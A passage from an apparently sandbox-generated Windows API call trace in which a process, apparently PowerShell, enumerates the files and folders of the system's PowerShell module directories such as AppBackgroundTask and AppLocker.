lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0140.088] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0140.089] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0140.089] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0140.089] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0140.089] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0140.089] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0140.090] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0140.090] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0140.090] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0140.090] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0140.090] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0140.091] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0140.091] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0140.091] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 0 [0140.091] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ddf0) returned 1 [0140.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ddb0) returned 1 [0140.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.092] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0xb156f8d810, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0140.092] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0xb156f8da40 | out: lpFindFileData=0xb156f8da40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a24e0 [0140.093] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.093] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0140.093] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0140.094] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0140.094] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0140.094] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0140.094] FindClose (in: hFindFile=0x1e3371a24e0 | out: hFindFile=0x1e3371a24e0) returned 1 [0140.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.095] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0xb156f8d810, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0140.095] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0xb156f8da40 | out: lpFindFileData=0xb156f8da40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a29c0 [0140.096] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.096] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0140.097] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0140.097] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0140.097] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0140.097] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.097] FindClose (in: hFindFile=0x1e3371a29c0 | out: hFindFile=0x1e3371a29c0) returned 1 [0140.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.099] CoTaskMemAlloc (cb=0x20e) returned 0x1e3510c91c0 [0140.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1e3510c91c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0140.099] CoTaskMemFree (pv=0x1e3510c91c0) [0140.110] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0xb156f8d8f0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0140.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.110] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0xb156f8de20 | out: lpFileInformation=0xb156f8de20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0140.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.110] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0xb156f8d870, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0140.110] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0xb156f8daa0 | out: lpFindFileData=0xb156f8daa0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a29c0 [0140.111] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.112] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0140.112] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0140.112] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0140.112] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0140.112] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0140.112] FindClose (in: hFindFile=0x1e3371a29c0 | out: hFindFile=0x1e3371a29c0) returned 1 [0140.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.119] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0140.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.121] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0xb156f8d810, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0140.121] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0xb156f8da40 | out: lpFindFileData=0xb156f8da40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a29c0 [0140.121] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, 